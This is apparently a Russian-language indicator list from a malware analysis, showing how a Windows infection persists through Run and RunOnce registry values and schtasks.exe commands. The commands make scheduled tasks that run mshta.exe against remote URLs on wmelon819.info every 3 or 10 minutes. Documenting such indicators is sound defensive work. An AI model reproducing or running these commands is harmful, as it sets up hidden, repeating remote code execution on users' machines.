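Техническая информация
Ниже перечислены признаки закрепления в системе: значения автозапуска в ветках Run и RunOnce реестра пользователя, файлы заданий планировщика и команды schtasks.exe, которые создают задания SystemBoot (каждые 3 минуты) и RegWrite (каждые 10 минут), запускающие mshta.exe с удалённым URL. Символы «#» в адресах в строках с schtasks.exe, по-видимому, являются маскировкой, сделанной источником: полный адрес приведён в записях реестра.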
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'SystemBoot' = 'mshta.exe http://374.wmelon819.info/pcsz/reg2.php?cccid=&log=1'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegWrite' = 'mshta.exe http://374.wmelon819.info/pcsz/set_inf2.php?cccid='
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'RegWrite' = 'mshta.exe http://374.wmelon819.info/pcsz/set_inf2.php?cccid='
- <SYSTEM32>\tasks\systemboot
- <SYSTEM32>\tasks\regwrite
- '%WINDIR%\syswow64\schtasks.exe' /create /tn SystemBoot /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/reg2.php?cc##### /sc MINUTE /mo 3' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn RegWrite /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/set_inf2.php?cc##### /sc MINUTE /mo 10' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn SystemBoot /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/reg2.php?cc##### /sc MINUTE /mo 3
- '%WINDIR%\syswow64\schtasks.exe' /create /tn RegWrite /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/set_inf2.php?cc##### /sc MINUTE /mo 10